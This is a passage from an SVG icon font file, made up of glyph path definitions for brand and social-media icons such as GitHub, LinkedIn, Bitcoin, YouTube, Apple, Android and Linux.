c-10.0996 12.2998 -18.2998 34.8994 -18.2998 56c0 54.1992 41 106.6 110.9 106.6c60.2998 0 102.6 -41.0996 102.6 -99.9004c0 -66.3994 -33.5 -112.399 -77.2002 -112.399c-24.0996 0 -42.0996 19.8994 -36.3994 44.3994c6.89941 29.2002 20.2998 60.7002 20.2998 81.8008
c0 53 -75.5 45.6992 -75.5 -25c0 -21.7002 7.2998 -36.5 7.2998 -36.5c-31.4004 -132.801 -36.0996 -134.5 -29.5996 -192.601l2.19922 -0.799805h-88.5996c-26.5 0 -48 21.5 -48 48v352c0 26.5 21.5 48 48 48h352c26.5 0 48 -21.5 48 -48z" />
    <glyph glyph-name="google-plus-square" unicode="&#xf0d4;" 
d="M400 416c26.5 0 48 -21.5 48 -48v-352c0 -26.5 -21.5 -48 -48 -48h-352c-26.5 0 -48 21.5 -48 48v352c0 26.5 21.5 48 48 48h352zM164 92c57.7002 0 96 40.5 96 97.5996c0 6.5 -0.599609 11.6006 -1.59961 16.6006h-94.4004v-34.4004h56.9004
c-2.40039 -14.5996 -17.2002 -43.0996 -56.8008 -43.0996c-34.0996 0 -61.8994 28.2998 -61.8994 63.2002c0 35 27.7998 63.1992 61.8994 63.1992c19.5 0 32.4004 -8.2998 39.8008 -15.3994l27.0996 26.0996c-17.5 16.4004 -40 26.2002 -67 26.2002
c-55.2998 0 -100 -44.7002 -100 -100s44.7002 -100 100 -100zM384 173.8v29.2002h-29v29h-29.2002v-29h-29v-29.2002h29v-29h29.2002v29h29z" />
    <glyph glyph-name="google-plus-g" unicode="&#xf0d5;" horiz-adv-x="640" 
d="M386.061 219.504c1.83398 -9.69238 3.14355 -19.3838 3.14355 -31.9561c0 -109.753 -73.6055 -187.548 -184.404 -187.548c-106.084 0 -192 85.915 -192 192s85.916 192 192 192c51.8643 0 95.083 -18.8594 128.611 -50.292l-52.126 -50.0303
c-14.1455 13.6211 -39.0283 29.5996 -76.4854 29.5996c-65.4834 0 -118.92 -54.2217 -118.92 -121.277s53.4365 -121.277 118.92 -121.277c75.9609 0 104.514 54.7451 108.965 82.7734h-108.965v66.0088h181.261v-0.000976562zM571.467 213.067h55.7334v-56.001h-55.7334
v-55.7334h-56.001v55.7334h-55.7324v56.001h55.7324v55.7324h56.001v-55.7324z" />
    <glyph glyph-name="linkedin-in" unicode="&#xf0e1;" 
d="M100.3 0h-92.8994v299.1h92.8994v-299.1zM53.7998 339.9c-29.7002 0 -53.7998 24.5996 -53.7998 54.2998s24.0996 53.7998 53.7998 53.7998s53.7998 -24.0996 53.7998 -53.7998s-24.0996 -54.2998 -53.7998 -54.2998zM448 0h-92.7002v145.6
c0 34.7002 -0.700195 79.2002 -48.2998 79.2002c-48.2998 0 -55.7002 -37.7002 -55.7002 -76.7002v-148.1h-92.7998v299.1h89.0996v-40.7998h1.30078c12.3994 23.5 42.6992 48.2998 87.8994 48.2998c94 0 111.3 -61.8994 111.3 -142.3v-164.3h-0.0996094z" />
    <glyph glyph-name="github-alt" unicode="&#xf113;" horiz-adv-x="480" 
d="M186.1 119.3c0 -20.8994 -10.8994 -55.0996 -36.6992 -55.0996c-25.8008 0 -36.7002 34.2002 -36.7002 55.0996c0 20.9004 10.8994 55.1006 36.7002 55.1006c25.7998 0 36.6992 -34.2002 36.6992 -55.1006zM480 169.8c0 -31.8994 -3.2002 -65.7002 -17.5 -95
c-37.9004 -76.5996 -142.1 -74.7998 -216.7 -74.7998c-75.7998 0 -186.2 -2.7002 -225.6 74.7998c-14.6006 29 -20.2002 63.1006 -20.2002 95c0 41.9004 13.9004 81.5 41.5 113.601c-5.2002 15.7998 -7.7002 32.3994 -7.7002 48.7998
c0 21.5 4.90039 32.2998 14.6006 51.7998c45.2998 0 74.2998 -9 108.8 -36c29 6.90039 58.7998 10 88.7002 10c27 0 54.1992 -2.90039 80.3994 -9.2002c34 26.7002 63 35.2002 107.8 35.2002c9.80078 -19.5 14.6006 -30.2998 14.6006 -51.7998
c0 -16.4004 -2.60059 -32.7002 -7.7002 -48.2002c27.5 -32.4004 39 -72.2998 39 -114.2zM415.7 119.3c0 43.9004 -26.7002 82.6006 -73.5 82.6006c-18.9004 0 -37 -3.40039 -56 -6c-14.9004 -2.30078 -29.7998 -3.2002 -45.1006 -3.2002
c-15.1992 0 -30.0996 0.899414 -45.0996 3.2002c-18.7002 2.59961 -37 6 -56 6c-46.7998 0 -73.5 -38.7002 -73.5 -82.6006c0 -87.7998 80.4004 -101.3 150.4 -101.3h48.1992c70.3008 0 150.601 13.4004 150.601 101.3zM333.1 174.4
c25.8008 0 36.7002 -34.2002 36.7002 -55.1006c0 -20.8994 -10.8994 -55.0996 -36.7002 -55.0996c-25.7998 0 -36.6992 34.2002 -36.6992 55.0996c0 20.9004 10.8994 55.1006 36.6992 55.1006z" />
    <glyph glyph-name="maxcdn" unicode="&#xf136;" horiz-adv-x="511" 
d="M461.1 5.2998h-97.3994l51.8994 242.7c2.30078 10.2002 0.900391 19.5 -4.39941 25.7002c-5 6.09961 -13.7002 9.59961 -24.2002 9.59961h-49.2998l-59.5 -278h-97.4004l59.5 278h-83.3994l-59.5 -278h-97.4004l59.5 278l-44.5996 95.4004h372.1
c39.4004 0 75.2998 -16.2998 98.2998 -44.9004c23.2998 -28.5996 31.7998 -67.3994 23.6006 -105.899z" />
    <glyph glyph-name="html5" unicode="&#xf13b;" horiz-adv-x="384" 
d="M0 416h384l-34.9004 -395.8l-157.6 -52.2002l-156.6 52.2002zM308.2 288.1l4.39941 47.7002h-241.1l12.7998 -145.6h166.9l-6 -62.2002l-53.7002 -14.5l-53.5 14.5l-3.5 38.0996h-47.7002l6 -75.7998l98.7002 -27.2998h1.09961v0.299805l97.9004 27l13.5996 148.4h-175.6
l-4.09961 49.3994h183.8z" />
    <glyph glyph-name="css3" unicode="&#xf13c;" horiz-adv-x="480" 
d="M480 416l-64 -368l-223.3 -80l-192.7 80l19.5996 94.7998h82l-8 -40.5996l116.4 -44.4004l134.1 44.4004l18.8008 97.0996h-333.4l16 82h333.7l10.5 52.7002h-333.4l16.2998 82h407.4z" />
    <glyph glyph-name="btc" unicode="&#xf15a;" horiz-adv-x="383" 
d="M310.204 205.362c46.0059 -11.0283 74.9971 -38.4443 69.3262 -99.8906c-7.24805 -76.5723 -61.5967 -97.0547 -142.896 -101.467v-68.0049h-48.5273v66.7451c-12.29 0 -25.21 0 -38.4443 0.314453v-67.0596h-48.5283v68.0049s-8.88867 0.31543 -97.3701 0.31543
l9.76758 57.666c34.7305 -0.614258 50.3301 -3.4209 53.2549 16.0703v217.43c-4.60645 24.5664 -24.709 22.1045 -63.0234 21.4268v51.6777c58.748 -0.275391 79.5283 -0.539062 97.3701 0v79.4092h48.5283v-77.833c12.9189 0.31543 25.8389 0.629883 38.4443 0.629883
v77.2031h48.5273v-79.4092c62.3926 -5.35547 109.492 -24.5781 114.851 -81.9287c4.09668 -41.9102 -13.5508 -67.1201 -41.2803 -81.2998zM150.608 313.447v-96.7402c27.416 0 113.126 -6.30273 113.126 48.2119c0 57.0352 -85.7109 48.5283 -113.126 48.5283z
M150.608 61.6709c32.7715 0 133.126 -6.93262 133.127 53.2529c0 62.3936 -100.355 53.2549 -133.127 53.2549v-106.508z" />
    <glyph glyph-name="youtube" unicode="&#xf167;" horiz-adv-x="576" 
d="M549.655 323.917c11.4121 -42.8672 11.4121 -132.305 11.4121 -132.305s0 -89.4385 -11.4121 -132.306c-6.28125 -23.6494 -24.7871 -41.5 -48.2842 -47.8203c-42.5908 -11.4863 -213.371 -11.4863 -213.371 -11.4863s-170.78 0 -213.371 11.4863
c-23.4971 6.32031 -42.0029 24.1709 -48.2842 47.8203c-11.4121 42.8672 -11.4121 132.306 -11.4121 132.306s0 89.4375 11.4121 132.305c6.28125 23.6504 24.7871 42.2754 48.2842 48.5967c42.5908 11.4863 213.371 11.4863 213.371 11.4863s170.781 0 213.371 -11.4863
c23.4971 -6.32031 42.0029 -24.9463 48.2842 -48.5967zM232.145 110.409l142.739 81.2012l-142.739 81.2051v-162.406z" />
    <glyph glyph-name="xing" unicode="&#xf168;" horiz-adv-x="384" 
d="M162.7 238c-1.7998 -3.2998 -25.2002 -44.4004 -70.1006 -123.5c-4.89941 -8.2998 -10.7998 -12.5 -17.6992 -12.5h-65.1006c-7.7002 0 -12.0996 7.5 -8.5 14.4004l69 121.3c0.200195 0 0.200195 0.0996094 0 0.299805l-43.8994 75.5996
c-4.30078 7.80078 0.299805 14.1006 8.5 14.1006h65.0996c7.2998 0 13.2998 -4.10059 18 -12.2002zM382.6 401.9l-144 -253v-0.300781l91.6006 -166.6c3.89941 -7.09961 0.200195 -14.0996 -8.5 -14.0996h-65.2002c-7.59961 0 -13.5996 4 -18 12.1992l-92.4004 168.5
c3.30078 5.80078 51.5 90.8008 144.801 255.2c4.59961 8.10059 10.3994 12.2002 17.5 12.2002h65.6992c8 0 12.3008 -6.7002 8.5 -14.0996z" />
    <glyph glyph-name="xing-square" unicode="&#xf169;" 
d="M400 416c26.5 0 48 -21.5 48 -48v-352c0 -26.5 -21.5 -48 -48 -48h-352c-26.5 0 -48 21.5 -48 48v352c0 26.5 21.5 48 48 48h352zM140.4 127.8c4.89941 0 9.09961 2.90039 12.5996 9.10059c32.0996 56.5 48.7998 85.8994 50.0996 88.1992l-31.8994 55.3008
c-3.40039 5.7998 -7.7002 8.69922 -12.9004 8.69922h-46.5996c-5.7998 0 -9 -4.5 -6 -10.0996l31.3994 -54c0.100586 -0.0996094 0.100586 -0.200195 0 -0.200195l-49.2998 -86.7002c-2.7002 -5 0.5 -10.2998 6 -10.2998h46.6006zM360.1 341.9
c2.80078 5.2998 -0.299805 10.0996 -6 10h-46.8994c-5.10059 0 -9.2002 -2.90039 -12.5 -8.7002c-66.6006 -117.4 -101.101 -178.2 -103.4 -182.3l66 -120.301c3.2002 -5.7998 7.40039 -8.69922 12.9004 -8.69922h46.5996c6.10059 0 8.7998 5 6 10.0996l-65.5 119v0.200195z
" />
    <glyph glyph-name="dropbox" unicode="&#xf16b;" horiz-adv-x="528" 
d="M264.4 331.7l-132 -84.2998l132 -84.3008l-132 -84.2998l-132.4 85.1006l132.3 84.2998l-132.3 83.5l132.3 84.2998zM131.6 52.2998l132 84.2998l132 -84.2998l-132 -84.2998zM264.4 163.9l132 84.2998l-132 83.5996l131.3 84.2002l132.3 -84.2998l-132.3 -84.2998
l132.3 -84.2002l-132.3 -84.2998z" />
    <glyph glyph-name="stack-overflow" unicode="&#xf16c;" horiz-adv-x="384" 
d="M290.7 137l-8.2002 -39l-195.7 41l8.2002 39.2998zM341.7 224l-25.5 -30.7998l-153.5 128.3l25.5 30.7998zM310.5 184.3l-16.7998 -36.2998l-181.2 84.5l16.7002 36.5zM262 416l119.3 -160.3l-32 -24l-119.3 160.3zM282.5 88v-39.7002h-200v39.7002h200zM322.2 8v120h40
v-160h-359.5v160h40v-120h279.5z" />
    <glyph glyph-name="instagram" unicode="&#xf16d;" 
d="M224.1 307c63.6006 0 114.9 -51.2998 114.9 -114.9c0 -63.5996 -51.2998 -114.899 -114.9 -114.899c-63.5996 0 -114.899 51.2998 -114.899 114.899c0 63.6006 51.2998 114.9 114.899 114.9zM224.1 117.4c41.1006 0 74.7002 33.5 74.7002 74.6992
c0 41.2002 -33.5 74.7002 -74.7002 74.7002c-41.1992 0 -74.6992 -33.5 -74.6992 -74.7002c0 -41.1992 33.5996 -74.6992 74.6992 -74.6992zM370.5 311.7c0 -14.9004 -12 -26.7998 -26.7998 -26.7998c-14.9004 0 -26.7998 12 -26.7998 26.7998s12 26.7998 26.7998 26.7998
s26.7998 -12 26.7998 -26.7998zM446.6 284.5c2.10059 -37 2.10059 -147.8 0 -184.8c-1.7998 -35.9004 -10 -67.7002 -36.1992 -93.9004c-26.2002 -26.2998 -58 -34.5 -93.9004 -36.2002c-37 -2.09961 -147.9 -2.09961 -184.9 0
c-35.8994 1.80078 -67.5996 10 -93.8994 36.2002s-34.5 58 -36.2002 93.9004c-2.09961 37 -2.09961 147.899 0 184.899c1.7998 35.9004 9.90039 67.7002 36.2002 93.9004s58.0996 34.4004 93.8994 36.0996c37 2.10059 147.9 2.10059 184.9 0
c35.9004 -1.7998 67.7002 -10 93.9004 -36.1992c26.2998 -26.2002 34.5 -58 36.1992 -93.9004zM398.8 60c11.7002 29.4004 9 99.5 9 132.1c0 32.6006 2.7002 102.601 -9 132.101c-7.89941 19.7002 -23 34.7998 -42.5996 42.5996c-29.4004 11.6006 -99.5 9 -132.101 9
c-32.5996 0 -102.6 2.7002 -132.1 -9c-19.7002 -7.89941 -34.7998 -23 -42.5996 -42.5996c-11.6006 -29.4004 -9 -99.5 -9 -132.101c0 -32.5996 -2.7002 -102.6 9 -132.1c7.89941 -19.7002 23 -34.7998 42.5996 -42.5996c29.4004 -11.6006 99.5 -9 132.1 -9
c32.6006 0 102.601 -2.7002 132.101 9c19.7002 7.89941 34.7998 23 42.5996 42.5996z" />
    <glyph glyph-name="flickr" unicode="&#xf16e;" 
d="M400 416c26.5 0 48 -21.5 48 -48v-352c0 -26.5 -21.5 -48 -48 -48h-352c-26.5 0 -48 21.5 -48 48v352c0 26.5 21.5 48 48 48h352zM144.5 129c35.0996 0 63.5 28.4004 63.5 63.5s-28.4004 63.5 -63.5 63.5s-63.5 -28.4004 -63.5 -63.5s28.4004 -63.5 63.5 -63.5z
M303.5 129c35.0996 0 63.5 28.4004 63.5 63.5s-28.4004 63.5 -63.5 63.5s-63.5 -28.4004 -63.5 -63.5s28.4004 -63.5 63.5 -63.5z" />
    <glyph glyph-name="adn" unicode="&#xf170;" horiz-adv-x="496" 
d="M248 280.5l64.9004 -98.7998h-129.801zM496 192c0 -136.9 -111.1 -248 -248 -248s-248 111.1 -248 248s111.1 248 248 248s248 -111.1 248 -248zM396.2 109.3l-148.2 223.2l-148.2 -223.2h30.4004l33.5996 51.7002h168.601l33.5996 -51.7002h30.2002z" />
    <glyph glyph-name="bitbucket" unicode="&#xf171;" horiz-adv-x="499" 
d="M16.2002 416.4l466.8 -0.200195c1 0 1.90039 -0.100586 2.7998 -0.200195c8.7002 -1.40039 14.6006 -9.59961 13.2002 -18.2998l-67.9004 -416.8c-1.2998 -7.80078 -8.09961 -13.5 -16 -13.4004h-325.699c-10.6006 0.0996094 -19.6006 7.7998 -21.3008 18.2002
l-67.8994 412.1c-0.100586 0.900391 -0.200195 1.90039 -0.200195 2.7998c0.0996094 8.90039 7.40039 15.9004 16.2002 15.8008zM302.1 118.6l25.2002 147h-157.3l28.0996 -147h104z" />
    <glyph glyph-name="tumblr" unicode="&#xf173;" horiz-adv-x="319" 
d="M309.8 -32.2998c-13.5996 -14.5 -50 -31.7002 -97.3994 -31.7002c-120.801 0 -147 88.7998 -147 140.6v144h-47.5c-5.5 0 -10 4.5 -10 10v68c0 7.2002 4.5 13.6006 11.2998 16c62 21.8008 81.5 76 84.2998 117.101c0.799805 11 6.5 16.2998 16.0996 16.2998h70.9004
c5.5 0 10 -4.5 10 -10v-115.2h83c5.5 0 10 -4.39941 10 -9.89941v-81.7002c0 -5.5 -4.5 -10 -10 -10h-83.4004v-133.2c0 -34.2002 23.7002 -53.5996 68 -35.7998c4.80078 1.89941 9 3.2002 12.7002 2.2002c3.5 -0.900391 5.7998 -3.40039 7.40039 -7.90039l22 -64.2998
c1.7998 -5 3.2998 -10.6006 -0.400391 -14.5z" />
    <glyph glyph-name="tumblr-square" unicode="&#xf174;" 
d="M400 416c26.5 0 48 -21.5 48 -48v-352c0 -26.5 -21.5 -48 -48 -48h-352c-26.5 0 -48 21.5 -48 48v352c0 26.5 21.5 48 48 48h352zM317.7 51.7998c2.2998 2.40039 1.2998 5.90039 0.299805 9.10059l-13.7998 40.1992c-1 2.80078 -2.40039 4.40039 -4.60059 4.90039
c-2.39941 0.599609 -5 -0.200195 -8 -1.40039c-27.6992 -11.0996 -42.5 1 -42.5 22.4004v83.2998h52.1006c3.39941 0 6.2002 2.7998 6.2002 6.2002v51.0996c0 3.40039 -2.80078 6.2002 -6.2002 6.2002h-51.9004v72c0 3.40039 -2.7998 6.2002 -6.2002 6.2002h-44.2998
c-5.89941 0 -9.5 -3.2998 -10 -10.2002c-1.7998 -25.7002 -13.8994 -59.5 -52.7002 -73.2002c-4.2998 -1.5 -7.09961 -5.5 -7.09961 -10v-42.5c0 -3.39941 2.7998 -6.19922 6.2002 -6.19922h29.7002v-90c0 -32.4004 16.3994 -87.9004 91.8994 -87.9004
c29.7002 0 52.4004 10.7002 60.9004 19.7998z" />
    <glyph glyph-name="apple" unicode="&#xf179;" horiz-adv-x="376" 
d="M314.7 179.3c0 -1.89941 -3.5 -61.2002 61.7002 -91.8994c-12.2002 -36.8008 -54 -118.601 -102.601 -119.301c-28.0996 0 -44.5996 17.9004 -76.3994 17.9004c-32.8008 0 -50.6006 -17.2998 -75.8008 -17.9004c-48.1992 -1.5 -94.3994 88.5 -107.199 125.2
c-9.60059 27.9004 -14.4004 55 -14.4004 81.2002c0 88.7002 59.2998 132.3 115.1 133.2c27 0 61.4004 -19.7002 76.4004 -19.7002c14.2002 0 53 23.5 88.5 20.7002c37.5 -2.90039 65.9004 -17.7002 84.7002 -44.6006c-33.6006 -20.3994 -50.2002 -48.0996 -50 -84.7998z
M258.1 343.5c-19.5996 -22.9004 -43.3994 -36.2998 -69.5 -34.2998c-2.19922 27.5996 8.10059 52.0996 25.6006 71.8994c15.8994 18.5 43.7998 33.5 67.8994 34.9004c0.800781 -10.5996 3.30078 -40.0996 -24 -72.5z" />
    <glyph glyph-name="windows" unicode="&#xf17a;" 
d="M0 354.3l183.6 25.2998v-177.399h-183.6v152.1zM0 29.7002v149.899h183.6v-175.199zM203.8 1.7002v177.899h244.2v-211.6zM203.8 382.3l244.2 33.7002v-213.8h-244.2v180.1z" />
    <glyph glyph-name="android" unicode="&#xf17b;" 
d="M89.5996 243.5v-115.8c0 -15.4004 -12.0996 -27.7002 -27.5 -27.7002c-15.2998 0 -30.0996 12.4004 -30.0996 27.7002v115.8c0 15.0996 14.7998 27.5 30.0996 27.5c15.1006 0 27.5 -12.4004 27.5 -27.5zM100.4 86.5v179.4h247.3v-179.4
c0 -16.4004 -13.2002 -29.5996 -29.4004 -29.5996h-20.2002v-61.1006c0 -36.7998 -55.5 -36.7002 -55.5 0v61.1006h-37.1992v-61.1006c0 -36.5996 -55.2002 -36.8994 -55.2002 0l-0.299805 61.1006h-19.9004c-16.4004 0 -29.5996 13.1992 -29.5996 29.5996zM348.4 275.6
h-249.101c0 42.8008 25.6006 80 63.6006 99.4004l-19.1006 35.2998c-2.7998 4.90039 4.2998 8 6.7002 3.7998l19.4004 -35.5996c34.8994 15.5 75 14.7002 108.3 0l19.2998 35.5c2.5 4.2998 9.5 1.09961 6.7002 -3.7998l-19.1006 -35.2002
c37.7002 -19.4004 63.3008 -56.5996 63.3008 -99.4004zM177.7 331.1c0 5.7002 -4.60059 10.5 -10.5 10.5c-5.7002 0 -10.2002 -4.7998 -10.2002 -10.5c0 -5.69922 4.59961 -10.5 10.2002 -10.5c5.89941 0 10.5 4.80078 10.5 10.5zM291.1 331.1
c0 5.7002 -4.59961 10.5 -10.1992 10.5c-5.90039 0 -10.5 -4.7998 -10.5 -10.5c0 -5.69922 4.59961 -10.5 10.5 -10.5c5.59961 0 10.1992 4.80078 10.1992 10.5zM385.9 271c15.2998 0 30.0996 -12.0996 30.0996 -27.5v-115.8
c0 -15.2998 -14.7002 -27.7002 -30.0996 -27.7002c-15.1006 0 -27.5 12.2998 -27.5 27.7002v115.8c0 15.4004 12.3994 27.5 27.5 27.5z" />
    <glyph glyph-name="linux" unicode="&#xf17c;" 
d="M220.8 324.7c-1.09961 0.599609 -3.09961 0.399414 -3.39941 1.7002c-0.200195 0.399414 0.199219 0.899414 0.599609 1.09961c1.59961 0.900391 3.7998 0.599609 5.5 -0.0996094c1.2998 -0.600586 3.40039 -1.5 3.2002 -2.90039
c-0.100586 -1.09961 -1.7998 -1.5 -2.90039 -1.5c-1.2002 0 -2 1.2002 -3 1.7002zM198.9 323c-1 -0.0996094 -2.7002 0.400391 -2.80078 1.40039c-0.199219 1.39941 1.90039 2.2998 3.2002 2.89941c1.7002 0.700195 3.90039 1 5.5 0.100586
c0.400391 -0.200195 0.799805 -0.700195 0.600586 -1.10059c-0.400391 -1.2002 -2.40039 -1 -3.5 -1.59961c-1 -0.5 -1.80078 -1.7002 -3 -1.7002zM420 44.2002c11.0996 -12.4004 15.9004 -21.5 15.5 -29.7002c-0.5 -8.2002 -6.5 -13.7998 -13.9004 -18.2998
c-14.8994 -9 -37.2998 -15.7998 -50.8994 -32.2002c-14.2002 -16.9004 -31.7002 -26.5996 -48.2998 -27.9004c-16.5 -1.2998 -32 6.30078 -40.3008 23v0.100586c-1.09961 2.09961 -1.89941 4.39941 -2.5 6.7002c-21.5 -1.2002 -40.1992 5.2998 -55.0996 4.09961
c-22 -1.2002 -35.7998 -6.5 -48.2998 -6.59961c-4.7998 -10.6006 -14.2998 -17.6006 -25.9004 -20.2002c-16 -3.7002 -36.0996 0 -55.8994 10.3994c-18.5 9.80078 -42 8.90039 -59.3008 12.5c-8.69922 1.80078 -16.2998 5 -20.0996 12.3008
c-3.7002 7.2998 -3 17.2998 2.2002 31.6992c1.7002 5.10059 0.399414 12.7002 -0.799805 20.8008c-0.600586 3.89941 -1.2002 7.89941 -1.2002 11.7998c0 4.2998 0.700195 8.5 2.7998 12.3994c4.5 8.5 11.7998 12.1006 18.5 14.5c6.7002 2.40039 12.7998 4 17 8.30078
c5.2002 5.5 10.0996 14.3994 16.5996 20.1992c-2.59961 17.2002 0.200195 35.4004 6.2002 53.3008c12.6006 37.8994 39.2002 74.1992 58.1006 96.6992c16.0996 22.9004 20.7998 41.3008 22.5 64.7002c1.09961 31.7998 -24.5 135.4 77.8994 135.2
c80.9004 -0.0996094 76.2998 -85.4004 75.7998 -131.3c-0.299805 -30.1006 16.3008 -50.5 33.4004 -72c15.2002 -18 35.0996 -44.2998 46.5 -74.4004c9.2998 -24.5996 12.9004 -51.7998 3.7002 -79.0996c1.39941 -0.5 2.7998 -1.2002 4.09961 -2
c1.40039 -0.799805 2.7002 -1.7998 4 -2.90039c6.60059 -5.59961 8.7002 -14.2998 10.5 -22.3994c1.90039 -8.10059 3.60059 -15.7002 7.2002 -19.7002zM223.7 360.7c-3.2002 -7.2002 -3.90039 -14.9004 -2.90039 -21.7998c3.60059 -0.900391 8.90039 -2.40039 13 -4.40039
c-2.09961 12.2002 4.5 23.5 11.7998 23c8.90039 -0.299805 13.9004 -15.5 9.10059 -27.2998c-0.799805 -1.90039 -2.7998 -3.40039 -3.90039 -4.60059c6.7002 -2.2998 11 -4.09961 12.6006 -4.89941c7.89941 9.5 10.7998 26.2002 4.2998 40.3994
c-9.7998 21.4004 -34.2002 21.8008 -44 -0.399414zM183 372.2c-18.9004 0 -24 -37.5 -8.40039 -52.1006c7.80078 5.7002 6.90039 4.7002 5.90039 5.5c-8 6.90039 -6.59961 27.4004 1.7998 28.1006c6.2998 0.5 10.7998 -10.7002 9.60059 -19.6006
c3.09961 2.10059 6.69922 3.60059 10.1992 4.60059c1.7002 19.2998 -9 33.5 -19.0996 33.5zM169.4 311.5c-4.2002 -3.2998 -5.60059 -7.40039 -4.2002 -12.2998c1.5 -4.90039 6.09961 -10.5 14.7002 -15.2998c7.7998 -4.60059 12 -11.5 20 -15
c2.59961 -1.10059 5.69922 -1.90039 9.59961 -2.10059c18.4004 -1.09961 27.0996 11.2998 38.2002 14.9004c11.7002 3.7002 20.0996 11 22.7002 18.0996c3.19922 8.5 -2.10059 14.7002 -10.5 18.2002c-11.3008 4.90039 -16.3008 5.2002 -22.6006 9.2998
c-10.2998 6.60059 -18.7998 8.90039 -25.8994 8.90039c-14.4004 0 -23.2002 -9.7998 -27.9004 -14.2002c-0.5 -0.5 -7.90039 -5.90039 -14.0996 -10.5zM172.7 -22.5c2.09961 20.5 -31.5 49 -41 68.9004l-19.6006 35.5996c-6.7998 9.2002 -13.7998 14.7998 -21.8994 16
c-7.7002 1.2002 -12.6006 -1.40039 -17.7002 -6.90039c-4.7998 -5.09961 -8.7998 -12.2998 -14.2998 -18c-7.7998 -6.5 -9.2998 -6.19922 -19.6006 -9.89941c-6.2998 -2.2002 -11.2998 -4.60059 -14.7998 -11.2998c-2.7002 -5 -2.09961 -12.2002 -0.899414 -20
c1.19922 -7.90039 3 -16.3008 0.599609 -23.9004v-0.200195c-5 -13.7002 -5 -21.7002 -2.59961 -26.3994c7.89941 -15.4004 46.5996 -6.10059 76.5 -21.9004c31.3994 -16.4004 72.5996 -17.0996 75.2998 18zM171.3 3.40039c37.6006 -25.7002 82.2002 -15.7002 114.3 7.19922
c3.2002 11 6.30078 21.3008 6.80078 29c0.799805 15.2002 1.59961 28.7002 4.39941 39.9004c3.10059 12.5996 9.2998 23.0996 21.4004 27.2998c2.2998 21.1006 18.7002 21.1006 38.2998 12.5c18.9004 -8.5 26 -16 22.7998 -26.0996c1 0 2 0.0996094 4.2002 0
c5.2002 16.8994 -14.2998 28 -30.7002 34.7998c2.90039 12 2.40039 24.0996 -0.399414 35.7002c-6 25.2998 -22.6006 47.7998 -35.2002 59c-2.2998 0.0996094 -2.10059 -1.90039 2.59961 -6.5c11.6006 -10.7002 37.1006 -49.2002 23.2998 -84.9004
c-3.89941 1 -7.59961 1.5 -10.8994 1.40039c-5.2998 29.0996 -17.5 53.2002 -23.6006 64.5996c-11.5 21.4004 -29.5 65.2998 -37.1992 95.7002c-4.5 -6.40039 -12.4004 -11.9004 -22.3008 -15c-4.69922 -1.5 -9.69922 -5.5 -15.8994 -9
c-13.9004 -8 -30 -8.7998 -42.4004 1.2002c-4.5 3.59961 -8 7.59961 -12.5996 10.2998c-1.60059 0.900391 -5.10059 3.2998 -6.2002 4.09961c-2 -37.7998 -27.2998 -85.2998 -39.2998 -112.699c-8.2998 -19.7002 -13.2002 -40.8008 -13.7998 -61.5
c-21.8008 29.0996 -5.90039 66.2998 2.59961 82.3994c9.5 17.6006 11 22.5 8.7002 20.7998c-8.60059 -14 -22 -36.2998 -27.2002 -59.1992c-2.7002 -11.9004 -3.2002 -24 0.299805 -35.2002s11.1006 -21.5 24.6006 -29.9004c0 0 24.7998 -14.2998 38.2998 -32.5
c7.39941 -10 9.7002 -18.7002 7.39941 -24.8994c-2.5 -6.7002 -9.59961 -8.90039 -16.6992 -8.90039c4.7998 -6 10.2998 -13 14.3994 -19.5996zM428.7 14.9004c0.299805 5.09961 -3.10059 13 -13.7002 24.5996c-10 11.2998 -7.2002 33.0996 -17.0996 41.5996
c-6.90039 6 -13.6006 5.40039 -22.6006 5.10059c-7.7002 -8.7998 -25.7998 -19.6006 -38.3994 -16.2998c-11.5 2.89941 -18 16.2998 -18.8008 29.5c-0.299805 -0.200195 -0.699219 -0.300781 -1 -0.5c-7.09961 -3.90039 -11.0996 -10.8008 -13.6992 -21.1006
c-2.5 -10.2002 -3.40039 -23.5 -4.2002 -38.7002c-0.700195 -11.7998 -6.2002 -26.3994 -9.90039 -40.5996c-3.5 -13.2002 -5.7998 -25.2002 -1.09961 -36.2998c7.2002 -14.5 19.5 -20.4004 33.7002 -19.2998c14.1992 1.09961 30.3994 9.7998 43.5996 25.5
c22 26.5996 62.2998 29.6992 63.2002 46.5zM173.3 299.3c-3.5 2.7998 -3.09961 6.60059 -1.7002 6.5c2.40039 -0.299805 2.80078 -3.5 4.30078 -4.89941c2 -1.90039 4.59961 -4.40039 7.69922 -6.90039c6.2002 -4.90039 14.5 -9.7002 24.9004 -9.7002
s22.5 6 29.9004 10.2002c4.19922 2.40039 9.5 6.59961 13.8994 9.7998c3.40039 2.5 3.2002 5.40039 6 5.10059c2.7998 -0.300781 0.799805 -3.2002 -3.09961 -6.60059c-3.90039 -3.39941 -9.90039 -7.7998 -14.7998 -10.3994
c-9.30078 -4.90039 -20.2002 -10.8008 -31.8008 -10.8008c-11.5 0 -20.6992 5.40039 -27.2998 10.6006c-3.2998 2.59961 -6 5.2002 -8 7.09961z" />
    <glyph glyph-name="dribbble" unicode="&#xf17d;" horiz-adv-x="512" 
d="M256 440c136.748 0 248 -111.252 248 -248s-111.252 -248 -248 -248s-248 111.252 -248 248s111.252 248 248 248zM419.97 325.634c-4.46582 -6.04102 -39.9629 -51.5459 -118.284 -83.5225c7.43652 -15.2217 12.8652 -27.5732 18.6172 -41.6143
c70.4844 8.86426 140.519 -5.34082 147.502 -6.81836c-0.46582 49.998 -18.332 95.9092 -47.835 131.955zM396.421 350.13c-52.0947 46.2188 -122.885 63.6816 -190.061 47.4893c5.85449 -7.83984 44.3281 -60.2324 79.04 -124.008
c75.3232 28.2324 107.211 71.0918 111.021 76.5186zM165.941 383.38c-59.2637 -27.9531 -103.562 -82.585 -117.298 -148.318c9.47461 -0.125 96.7471 -0.503906 195.834 25.8096c-35.0986 62.3926 -72.9512 114.85 -78.5361 122.509zM44.1699 191.677
c0 -54.4072 20.624 -104.082 54.457 -141.636c34.3369 58.7793 103.932 120.731 180.531 142.306c-5.31738 12.0342 -11.1104 24.0811 -17.1738 35.9492c-105.786 -31.6592 -208.438 -30.3359 -217.706 -30.1455c-0.0654297 -2.15137 -0.108398 -4.30762 -0.108398 -6.47363
zM125.977 24.5645c62.7539 -48.9355 144.656 -56.8955 212.769 -27.8828c-3.15039 18.585 -15.4492 83.3555 -45.1895 160.639c-85.4004 -29.1348 -145.452 -87.5234 -167.579 -132.756zM374.357 16.0752c47.5215 32.1338 81.3525 83.0371 90.7949 141.978
c-7.24707 2.28711 -65.5674 19.6816 -131.947 9.05566c27.7061 -76.1367 38.9805 -138.147 41.1523 -151.033z" />
